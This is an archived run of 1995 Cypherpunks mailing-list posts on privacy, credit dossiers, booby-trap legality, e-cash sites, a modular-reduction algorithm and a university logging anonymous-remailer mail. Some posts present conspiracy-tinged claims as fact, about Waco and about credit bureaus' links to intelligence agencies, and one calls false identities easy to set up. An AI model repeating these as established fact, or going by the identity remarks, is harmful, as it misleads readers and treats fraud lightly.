>life, as easy as it is to get one on the 'net that is, then I would most
>certainly do so..

I was not saying such nums are easy to use in the real world (though
friends of mine have VISA cards in fictitious names, and the cards are
fully functional, and are not just "second names" on their main card).

What I am saying is that we should be very careful not to lobby for laws
which will make the surveillance state _more_ invasive, and more insinuated
into every aspect of our lives.

Be concerned about the dossier society, just don't look to "the government"
to protect you. Not only will they continue to keep their own dossiers (*),
they'll use such "Data Privacy" laws to invade the privacy of others.

(* I've got a long section in my Cyphernomicon on the ties between the Big
Three of credit reporting agencies, the FinCEN and similar folks, the
intelligence agnencies, and Witness Protection folks who give out those
wonderful new identities. You think the Big Three don't know immediately
who the 50,000+ people in Witness Protection (aka Witness Security) are?
This may sound like something from the "Vince Foster and Danny Casolaro
conspiracy tapes," but it has some direct links to Cypherpunks issues: the
Feds have the power now to create new identities, falsify past financial
records, and run the scams that these methods imply...and the Big Three are
all headquartered within a few miles of the relevant agencies, in Vienna,
Langley, MacLean, Tyson's Corner, Herndon, Chantilly, Reston, and suchlike
spook haunts in No. Virginia.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 6 Sep 95 14:18:30 PDT
To: hallam@w3.org
Subject: booby-traps, crypto, guns, and tea
In-Reply-To: <9509061938.AA02249@zorch.w3.org>
Message-ID: <Pine.SOL.3.91.950906170633.668B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Sep 1995 hallam@w3.org wrote:

> 
> Under UK law it is certainly illegal to create any device with the
> intention of causing greivous bodily harm to anyone. The right to self
> defense is very precisely that, the right to take reasonable steps to 
> defend yourself with commensurate force if attacked.
[...]

> 
> People who go round drawing parallels to gun ownership and cryptography 
> ownership are simply playing into the governments hands. Cryptography has net 
> benefits to society. Most advocates of gun ownership tend to convince me of 
> little more than they are a danger to society. Regardless of their case they are 
> the biggest argument for gun control, and therfore poor advocates of their 
> cause. I see their attempts to draw parallels with cryptography to be little 
> more than trying to shore up their sinking ship with one thats afloat.
> 
> 
> 		Phill
> 

King George didn't like us owning guns either.  I'm pleased my ancestors 
had a difference of opinion with him concerning this and a few other things.

Brad 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 6 Sep 95 08:14:19 PDT
To: cypherpunks@toad.com
Subject: Michael Moriarity in _Penthouse_ on Law Enforcer Power Expansion
Message-ID: <199509061513.RAA17510@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


From: "Clay Irving" <clay@panix.com>
Date: Wed, 6 Sep 1995 07:36:47 -0500
To: sea-list@panix.com
Subject: (Fwd) Michael Moriarity in _Penthousse_
Mime-Version: 1.0

Thought I'd pass this along -- It was in my mailbox this morning...

--- Forwarded mail from "Linda Thompson, American Justice Federation" 
<iquest.net!lindat>

Date: Wed, 6 Sep 95 02:52 EST
To: news@aen.org
From: lindat@iquest.net (Linda Thompson, American Justice Federation)
Subject: Michael Moriarity in _Penthousse_


In the "Special 26th Anniversary Issue -- Collector's Edition" of
_Penthouse_, Michael Moriarity wrote the "Advise & Dissent" feature.
The cover tickler reads: "Michael Moriarity -- Charging Janet Reno with
Genocide"


                TREES FOR ALL THE DEAD CHILDREN
                        by Michael Moriarity

[The author is an Emmy, Tony, and Golden Globe award-winning actor. He
is also an accomplished classical and jazz pianist-composer, with three
CDs in release and another about to be recorded.]

_A nation may lose its liberties in a day and not miss them for a
century._ Montesquieu

I am sitting in a sidewalk cafe in Canada at the moment. I am here
because I can no longer live in the United States of America. The nation
my father knew as a surgeon for the Detroit Police Department and the
country in which my grandfather built a 50-year professional baseball
career has become a nightmare of lies, propaganda, and vicious
disinformation pouring out of Washington, D.C.

Today, the F.B.I. and Janet Reno are asking for new legislation that
would permit them to investigate anyone for simply opposing their ideas
of what causes violence. I protested the attorney general's initial
assault on network television during her back-room meetings with NBC
executives. "What are we talking about here?" asked Dick Wolf, executive
producer of "Law and Order." "Federally controlled programming between
the hours of three and six?"

"How about three to nine."

Janet Reno said that without a question mark. It was not a request. It
seemed to her a foregone conclusion. She had the right to say the most
insane thing I've heard from a reasonably well-dressed person, let alone
the highest law-enforcement officer in the land. she claimed that the
mere words of a murder-mystery TV show were dangerous to the health of
the nation.

I simply asked that she be relieved of her post and sent on a long
vacation and given therapy. Who left their jobs instead? Philip Heymann,
her respected deputy, and yours truly. Resignations in protest. Now she
and her Justice Department -- and even more recently, Bob Dole, the next
frighteningly viable candidate for president of the United States --
would like to brand all artists and producers dealing with dramatizes
violence and sex as accessories to drive-by shootings, terrorist
bombings, and the moral degeneration of our nation. And she's hoping
that people like me and Rush Limbaugh, and anyone who makes fun of her,
like David Letterman, will be counted by the American public as
accessories to the bombing in Oklahoma.

Did Al Capone really learn everything he knew from George Raft? Was the
death of Christopher Marlowe a product of the fight scenes in William
Shakespeare's _Romeo and Juliet_?

Blaming violent drama for real-life violence is like indicting
_Penthouse_ for the spread of AIDS.

Until I left my country, I was living in a novel by Franz Kafka, with
characters like the real Elie Wiesel telling me, "It's not possible,
Michael. This is America."

They told Elie and his family the same thing in Europe, just before they
carted him off to Auschwitz. "It's not possible, Elie. This is Germany."

How far is Janet Reno willing to go in her definition of what is causing
violence?

"I know 'Murder She Wrote' has no violent images," said the attorney
general, "but they talk about nothing but violence." What does this
mean? Does she charge that Jessica Fletcher was an agent provocateur for
Timothy McVeigh in the Oklahoma City bombing? Has Angela Lansbury been
derelict in her concern for the children? Was Reno's fear of language,
this frontal assault on the entire meaning of the First Amendment,
merely a lapse in the attorney general's thinking process?  As "kooky"
and as "noisy" and as "paranoid" as I am accused of being, I have never
put together a sentence quite that sick.

Where was the reaction from the Fourth Estate, the one branch of our
democratic process that is sworn, above all, to uphold our freedom of
speech? Today, unfortunately, the media is a direct extension of the
two-party system, and now that the Republicans and Democrats are a
coalition dedicated to expanding federal law-enforcement armies
exponentially, there is little protest from the pundits. A coalition in
a two-party democracy is not an option. It is tyranny.

Since mainstream American journalism is either Republican or Democratic,
we now hear no outcry (although _The New York Times_ did quote one
"law-enforcement official at the Treasury Department .. who spoke on
condition that he not be named, [who] said there was a tremendous
potential for abuse in some of the recent F.B.I. proposals to relax the
standards for investigating suspected terrorists").

Speaking out publicly would risk careers, and if anything is at fault
for the disastrous situation we are in, it is a mad obsession with
career. Read John Dean's _Blind Ambition_ if you don't believe me. My
role in the miniseries "Holocaust" -- that of the Nazi lawyer Eric Dorf
 -- was inspired by the idea that if Watergate's John Dean were a German
professional in the 1930s and less sensitive to his own corruption, he
would have risen to the very top of the Third Reich.  With no strong
feelings, apart from an obsession with his own career, such a man would
find himself standing proudly at the side of Adolf Hitler.

"Free speech," the Justice Department seems to be saying, "is the root
cause of all violence." Has anyone been fired for such a tyrannical
notion? No, but Jocelyn Elders was dismissed for broaching the
possibility that our drug laws should be reexamined, and for speaking
honestly about AIDS and condoms and children.

I began my campaign fighting the drug laws. I'm right back to those
statutes as the main cause of domestic violence in America. Only this
time the violence is not the drive-by shootings in ghettos. It is the
speed with which our law enforcement has been destroyed from within by
its own increasing power.

The F.B.I. will be given almost absolute power to harass and wiretap and
investigate any opponent of the standing government. The drug laws and
now, so conveniently, the Oklahoma City bombing are the linchpins for
billions of dollars pouring into the American law-enforcement community.
Their increasing freedom to hassle suspected anti-big-government
agitators must not be threatened.

Will it work? Not if this nation sees the tapes called _Waco: The Big
Lie_, a two-part examination of the murder of the Branch Davidians.
This video, which Gary Null wrote about in _Penthouse_ this past April,
is all over the country now, and more and more people will see it
despite how Janet Reno, the F.B.I., and the leadership of both parties
try to misinform the public about the tapes and their maker, Linda
Thompson. The obvious questions raised by Thompson's analysis of
government-approved violence are damning to the F.B.I., the Bureau of
Alcohol, Tobacco, and Firearms, Janet Reno, and all other parties
accessory to the obvious cover-up. They show hard evidence of a
government lynch mob at Waco.

If the Rodney King tapes won him $2 million, the implications of _Waco:
The Big Lie_ could win the surviving Branch Davidians tens and possibly
hundreds of millions from the government, criminal charges against
perpetrators, and the downfall of major careerists in the current
administration.

Now, with the help of her spokesmen, who just happen to be President
Clinton and Bob Dole, possibly the next occupant of the White House,
Janet Reno is trying to convince America that her enemies are just as
bad as her own army. They can't be worse. Try as she may, she knows that
history cannot draw the bombers of children as any worse than the
burners of children.

Washington, D.C., is saying that there is a difference between the
children of Waco and the children of Oklahoma City. The deaths in
Oklahoma warrant capital punishment. "Swift and severe punishment," was
the fate the president and attorney general promised for the killers of
federal employees.

Since the F.B.I., the C.I.A., A.T.F., and other arms of federal law
enforcement have been gutting the Bill of Rights for years, such threats
are not unlike the reprisals announced in Germany following the
Reichstag fire.

What about the death of civilians? Not only does Reno not call for
capital punishment for the incineration of the Waco children and the
equally cold-blooded murders in Idaho of survivalist Randy Weaver's wife
and child by federal agents, her response to these crimes doesn't even
merit the term _pursuit of justice_. And any movement that calls for
such justice, like Linda Thompson's American Justice Federation, is
branded "fanatic."

Who has more blood on their hands? Network television or federal law
enforcement?

Until justice befalls the Justice Department, a tree must be planted for
all the children of violence ... including the children of Waco.

"Peace is not the absence of war," said one letter written to me while I
was performing in the television series "Law and Order." "It is the
presence of Just."




---End of forwarded mail from "Linda Thompson, American Justice 
Federation" <iquest.net!lindat>

-- 
    .-.                                                               .-.
   /   \           .-.                                 .-.           /   \
  /     \         /   \       .-.     _     .-.       /   \         /     \
-/--Clay Irving-N2VKG-(clay@panix.com)-\---/---\-----/-----\-------/-------\--
    http://www.panix.com/clay     `-'   `-'     \   /       \     /
           \   /         `-'                     `-'         \   /
            `-'                                               `-'





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas M. Swiss" <tms@TIS.COM>
Date: Wed, 6 Sep 95 14:34:39 PDT
To: David Neal <dneal@usis.com>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.BSI.3.91.950906151200.9473A-100000@usis.com>
Message-ID: <199509062125.RAA10123@ziggy.tis.com>
MIME-Version: 1.0
Content-Type: text/plain



David Neal <dneal@usis.com> writes:

>I sent this to the risks moderator some time back, but I guess
>he didn't like it. 

     I can guess why; PGN might be skeptical of your precognitive powers. B->

>...
>As advertised in the trade magazine "DM News" (Direct Marketing News),
>Apr. 24, 1997, V. 17 N. 16.  I've typed the entire text of the advertisement,
          ^^^^


-Tom Swiss / tms@tis.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 6 Sep 95 14:57:13 PDT
To: dneal@usis.com (David Neal)
Subject: Re: Collection of personal info
In-Reply-To: <Pine.BSI.3.91.950906163504.11543A-100000@usis.com>
Message-ID: <199509062144.RAA05718@cushing.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| But back to the topic; am I the only one who gets the willies just
| reading this?  

	No.  But the interesting question is, what to do about it?
The answer in part, is personal anonymity through cash and avoiding US
IDs.  But in the long run, thats broken.  You can't have privacy for
1000 people; they'll just toss us all in jail.

	In the long run, we need to convince most Americans that their
freedom is worth more than the Drug War.  The only way to do that is
to look and sound reasonable, and convince people a few at a time.  Do
it with letters to the editor, editorials, articles for your local
newspaper, discussions on the street.

	Try not to rant; if you sound like a nut, people dismiss your
ideas along with you.  Be reasonable and measured.  Use a spell
checker.  Stick to one idea, and give a few backing points.  Don't
insult your opponent.  Don't try for a convoluted closing or slogan.

	(This isn't to disparage the creation of new facts, like an
international remailer network.  I am saying that the problems are as
much political as technological.)

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 6 Sep 95 17:48:44 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: fast modular reduction
Message-ID: <Pine.SUN.3.91.950906174500.9460B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


During the Crypto' 95 Rump Session, Josh Benaloh of Microsoft Corp. 
presented a new modular reduction algorithm that he and I developed.  It 
is faster than the Montgomery method by about 10 to 15%, and is more 
general and easier to understand.  The central idea is that it is easy to 
reduce a number to an equivalent one that's just one "block" (machine 
word) longer than the modulus, by repeatedly subtracting off the highest 
block, and adding back something that's equivalent, but smaller.

In the following pseudocode, B is the radix in which the numbers are 
represented (2^32 for a 32-bit machine), n is the length of modulus in 
blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 
is the length of X, and Y is the result.

1. Y = X
2. For i from k down to n+1, repeat steps 3 and 4
3.	Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1)
4.	If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1)

Tricks can be used to eliminate step 4, and to reduce Y to n blocks using 
one single precision division, and n more single precision 
multiplications.  The algorithm will hopefully be written up more 
completely soon.

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Wed, 6 Sep 95 17:20:55 PDT
To: hallam@w3.org
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <9509061938.AA02249@zorch.w3.org>
Message-ID: <199509070020.SAA01751@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> There is no self defense argument where the purpose is not to prevent
> physical harm. 


If this were a political philosophy list I would state that self-defense
justification often extends to property (As I believe it should).  Since 
this is a cryptography-and-social-changes-thereof list I will refrain...


> People who go round drawing parallels to gun ownership and cryptography 
> ownership are simply playing into the governments hands.
<snip>


No!  Stop!  Don't say it!  PLEASE go post this message to 
alt.security, talk.politics.guns and alt.fan.david-sternlight and keep it 
away from this list...


Bryce (toss in alt.flame while you are at it...)

signatures follow:


                                    +                                           
      public key on keyservers      /.      island Life in a chaos sea        
      or via finger 0x617c6db9      /           bryce.wilcox@colorado.edu     
                                    ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBME46vvWZSllhfG25AQEX9QP9HpngGnwA1rSEo7knTJ8RalpK9HbZm0u/
SkO6blQCV8kqcYxN5uZTFefCQPjTakEaUv8YnWpHNGOfFIu8igNOGMTCTV6ptVEy
rYKqupcycYXugN7XGdgQH2UNCUO2M59FpBC65nm4FB05ZUrwYyz0weeCkmxDTZHP
1FKRnjXpWrU=
=b3yP
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 6 Sep 95 18:27:08 PDT
To: Wei Dai <weidai@eskimo.com>
Subject: Re: fast modular reduction
Message-ID: <v02120d11ac7406fa32d1@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



I was very distressed when Josh gave this presentation; apparently
patents have been filed, etc., and someone from another company
in Europe was claiming they'd _already_ patented it.

What is the story here? From my pov, the performance increase doesn't
justify the ramifications of dealing with yet another potentially
surly patent holder (either Microsoft in your case, or whoever the
irate European fellow was who claims to have already patented it.)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 18:18:52 PDT
To: cypherpunks@toad.com
Subject: Re: Collection of personal info
Message-ID: <ac73977f1d0210041506@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:07 AM 9/7/95, Rob Lowry wrote:

>Again, you both are correct, and perhaps I was overstating my position in
>regards to the TRW/etc. groups.. I have a tendancy to do so. Each of us
>has the responsibility to monitor the activities in our lives, both
...

You mentioned you're a newcomer to the list, so all is forgiven.

Seriously, what you'll notice is that people (like me) will respond to
arguments made, and, for obvious reasons, concentrate on the points of
difference rather than the points of agreement.

So, keep posting!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Wed, 6 Sep 95 16:25:19 PDT
To: cypherpunks@toad.com
Subject: cryptography eliminates lawyers?
Message-ID: <199509062335.SAA02364@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: "Cortland D. Starrett" <cort@bioanalytical.com>
>Subject: cryptography eliminates lawyers?

>As a follow-up to the article reference I posted, I pose the
>following question:
>
>Will cryptographic technology and information (communication)
>technology reduce the need for legal services in the future?
>(especially regarding contracts, buying/selling, patent law, etc.)
>Will legal services just look different?  Will they be more
>efficient (cheaper)?
>
>Put bluntly, will cryptography put lawyers out of business?
>Any comments would be appreciated.
>
>Cort.
>
How could crypto put lawyers out of business?  People would still
have disagreements; plans would still go wrong; cars would still
crash.  More important, transactions would still need to be 
structured to carry out the desires of the parties while minimizing
risks.

Good communications technology, including crypto, could make lawyering
more efficient, but I suspect the savings would be minimal.

Communications technology will no more put lawyers out of business
than CASE put programmers out of business.
Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 19:11:12 PDT
To: Mac Norton <robl@on-ramp.ior.com>
Subject: Re: Collection of personal info
Message-ID: <ac73a1e41f0210048666@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:49 AM 9/7/95, Mac Norton wrote:
>Tim and I have corresponded about this previously,
>and again he neglects the distinction between
>collection and storage, on the one hand, and
>retrival and dissemination, on the other.  If you
>do the latter, your content better be accurate.
>
>That's the difference in Tim and TRW.  So far.:)

I don't really disagree with Mac, at least practically speaking.

(At a much deeper level, much deeper in terms of philosophy, I'm not even
sure _disseminators_ of information have any real necessity to be correct.
This is the issue of truth, reputation, etc. that we discuss so often. But,
I admit that the legal system does not support my anarcho-capitalist
extreme position, which is why I say I don't disagree with Mac,
"practically speaking.")

However, even if I were to start distributing the results of "Tim's
BlackNet Dossier Service," I don't think there's any justification for
people insisting that they have a right to "inspect" my records.

I think the current U.S. law is not too far from my own views. The credit
reporting agencies have an obvious interest in having accurate
information--except for the folks in the Witness program--and will
eventually correct errors. (Not everyone is happy with the speed, but this
is life in a world of finite resources; and I acknowledge that there are
pathological cases of incorrect identity, etc.)

I still favor free market alternatives to top-down government "protection."

And, lest anyone think I'm lapsing in my basic beliefs, I lean toward
throwing out _all_ laws about libel, slander, and false information. After
all, "what is truth?," to coin a phrase.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Wed, 6 Sep 95 19:32:32 PDT
To: cypherpunks@toad.com
Subject: University logging mail to anon.penet
Message-ID: <199509070230.TAA24609@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


This just came up locally, and I'd like to have some comments on it, 
especially from people who understand the law a lot better than I do:

Our local University apparently has been logging ALL mail to anon.penet,
including faculty, students, and off-campus users.

They maintain such weak security that someone was able to "obtain"
the logs and post them to a local usenet group, thus compromising
everyone's "anonymous" identities.

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Wed, 6 Sep 95 18:50:35 PDT
To: cypherpunks@toad.com
Subject: Re: e$ sites of interest
Message-ID: <v01510107ac73fff3792d@[198.59.115.131]>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate wrote,
>Found these in PC Week and thought I would pass them along...

For me, new to this, I found NetBank's Netcash(tm) to be the most interesting
even with its little built-in protection from those who spend money twice.
NetBank's URL is this:

     http://www.teleport.com/~netcash/

It is listed with many others in

>Network Payment Mechanisms and Digital Cash - http://ganges.cs.tcd.ie/
>                                                   mepeirce/project.html
>
>       Overview of trands and techniques, with several useful links for
>       additional information.

Dar
(list newbie)

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 6 Sep 95 17:52:56 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <ac7271110e021004e592@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.950906194301.8489A-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


If the jury isn't persuaded betond reasonable doubt 
that you were in genuine apprehension of serious harm
to yourself or your family--not your property--then
you will be acquitted of using violence to repel an
intruder into your home.  Maybe not your south 40,
but your home.  

Indeed, if the local prosecutor or US Atty believes,
on the positive side, that your actions were reasonable,
you probably won't even be charged.  

Now, that doesn't of itself make deadly force right,
but as I'm just through with cleaning two shotguns
(dove season here, going again Friday), I'm not going 
to argue the point too vigorously.  I'd say the morality 
of such situations, leaving aside the legality, is 
extremely fact-intensive.

Situational ethics?  Excessive subjectivity?  I think
not--I think we can apply objective standards to each
individual case, but it's fatuous to do so in advance.

MacN

On Tue, 5 Sep 1995, Timothy C. May wrote:

> >I don't know what you call it but if nothing else it is ethicaly and moraly
> >reprehinsible.
> 
> Different strokes for different folks. Anyone entering my house unannounced
> faces lethal response. I think of it as evolution in action, and doubt I
> would lose any sleep over this.
> 
> It has nothing to do with equating human life over property, it has to do
> with defending one's property and (maybe) one's life. Here in California,
> it is becoming more and more common for "home invasions" to be followed by
> execution of all of the witnesses. (Read "The San Jose Mercury News" for
> accounts of gang invasions in which all the residents in a home are lined
> up and shot, excecution-style.)
> 
> I won't get into a discussion of which states permit lethal force
> responses, as this is a topic which even I think belongs in
> talk.politics.guns or similar fora.
> 
> Suffice it to say that most states allow lethal response under threatening
> circumstances.
> 
> --Tim May
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 6 Sep 95 16:52:17 PDT
To: Rob Lowry <robl@on-ramp.ior.com>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.LNX.3.91.950906163311.6403B-100000@on-ramp.ior.com>
Message-ID: <Pine.SUN.3.91.950906194621.9114A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Sep 1995, Rob Lowry wrote:

> > Rob, I have entered this posting of yours into the "BlackNet Dossier
> > Service" I operate.
> 
> At least you notified me.. :) Something the TRW crew or others like them 
> do not do.
> 
> 
> > If someone doesn't want their postings going into my 220 megabyte file of
> > postings, they shouldn't send them to me. Or they should adopt a digital
> > pseudonym, unlinkable to their True Name or any other nyms they may have.
> 
> This is true.. I could adopt a nym, such as I use on my BBS, or when I am 
> doing other stuff on the net.. but it is difficult at best to get a new 
> set of credit cards, ID and so on with a new name/alias and still 
> maintain your own name.

In fact it's not difficult.  It's quite simple to estlablish new identity 
for the individual willing to risk the charges and consequences of 
exposure.  The basic impediment is time.  Good credit doesn't come 
overnight.  The second impediment is tax evasion- which is less than 
justifiable in the United States on the grounds of privacy.  If you're 
willing to be patient, and pay taxes on more than one name, its easy to 
maintain several identities.


> If it were possible to have an alias in real 
> life, as easy as it is to get one on the 'net that is, then I would most 
> certainly do so..

Which tells me how serious you really are about your privacy.  You have 
made a decision here about how much trouble privacy is worth to you, 
which is "not much."

I hear people bitch about privacy endlessly.  Privacy helps those who 
help themselves to privacy.  I think Mr. May was precisely correct in saying 
that it is so much easier and simpler for one to rely on self privacy 
insurance rather than government privacy insurance.

> 'Frothmonger' <g>
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 6 Sep 95 18:11:26 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Are booby-trapped... [Detailed treatment]
In-Reply-To: <Pine.SUN.3.91.950906014806.24142A-100000@access2.digex.net>
Message-ID: <Pine.SOL.3.91.950906200425.8489D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Thing about the Restatement (any of 'em) is that they
must be read carefully, being especially wary of
circularity.  Note here that the actor would be privileged
only to the extent he would be privileged, get it? under
some other body of law not specifically referenced.

So it all comes back to reasonable apprehension of bodily
harm to yourself or your family (or guests, I suppose), in 
your home or similar place.

MacN

On Wed, 6 Sep 1995, Black Unicorn wrote:
> 
> The basic rule today in most states resembles the restatement position:
> 
> Section 85.  Use of Mechanical Device Threatening Death or Serious 
> Bodily Injury.
> 
> The actor is so far privileged to use such a device intended or likely 
> to cause serious bodily harm or death for the purpose of protecting his 
> land or chattels from intrusion that he is not liable for the serious 
> bodily harm or death thereby caused to an intruder whose intrusion is, 
> in fact, such that the actor, were he present, would be privileged to 
> prevent or terminate it by the intentional infliction of such harm.
> 
[big snip of excellent research]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 6 Sep 95 18:10:56 PDT
To: cypherpunks@toad.com
Subject: e$ sites of interest
Message-ID: <199509070116.UAA00143@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

Found these in PC Week and thought I would pass them along...

CARI - http://www. netresource.com/itp/cari.html

       Collect All Relevant Information, a transaction system that doesn't
       require live transmission of sensitive data.

Cybercash Inc. - http://www.cybercash.com/

       Secure transaction over the internet, using credit and cash payment
       systems.

Digicash - http://www.digicash.com/

       Electronic transaction products include ecash; find the links to
       ecash-centric 'cybershops'.

First Virtual - http://www.fv.com/

       Secure internet-based system that uses the WWW and email for digital
       payment transactions.

Internet Banking - http://sfnb.com/wpaper.html

       White paper on electronic commerce

NetChex - http://www.netchex.com/index.html

       Secure transactions over the internet, using a bank account debit
       system.

Network Payment Mechanisms and Digital Cash - http://ganges.cs.tcd.ie/
                                                   mepeirce/project.html

       Overview of trands and techniques, with several useful links for
       additional information.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Wed, 6 Sep 95 20:29:03 PDT
To: cypherpunks@toad.com
Subject: Re: University logging mail to anon.penet
In-Reply-To: <199509070306.XAA18362@libws4.ic.sunysb.edu>
Message-ID: <199509070326.UAA24732@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> So which university is this?
> 
> > This just came up locally, and I'd like to have some comments on it, 
> > especially from people who understand the law a lot better than I do:
> > 
> > Our local University apparently has been logging ALL mail to anon.penet,
> > including faculty, students, and off-campus users.
> > 
> > They maintain such weak security that someone was able to "obtain"
> > the logs and post them to a local usenet group, thus compromising
> > everyone's "anonymous" identities.
> > 
California State Polytechnic University, San Luis Obispo

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 6 Sep 95 18:50:03 PDT
To: Rob Lowry <robl@on-ramp.ior.com>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.LNX.3.91.950906163311.6403B-100000@on-ramp.ior.com>
Message-ID: <Pine.SOL.3.91.950906204509.8489J-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Tim and I have corresponded about this previously,
and again he neglects the distinction between 
collection and storage, on the one hand, and 
retrival and dissemination, on the other.  If you
do the latter, your content better be accurate.

That's the difference in Tim and TRW.  So far.:)

MacN

On Wed, 6 Sep 1995, Rob Lowry wrote:

> > Rob, I have entered this posting of yours into the "BlackNet Dossier
> > Service" I operate.
> 
> At least you notified me.. :) Something the TRW crew or others like them 
> do not do.
> 
> 
> > If someone doesn't want their postings going into my 220 megabyte file of
> > postings, they shouldn't send them to me. Or they should adopt a digital
> > pseudonym, unlinkable to their True Name or any other nyms they may have.
> 
> This is true.. I could adopt a nym, such as I use on my BBS, or when I am 
> doing other stuff on the net.. but it is difficult at best to get a new 
> set of credit cards, ID and so on with a new name/alias and still 
> maintain your own name. If it were possible to have an alias in real 
> life, as easy as it is to get one on the 'net that is, then I would most 
> certainly do so..
> 
> 'Frothmonger' <g>
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 21:11:15 PDT
To: cypherpunks@toad.com
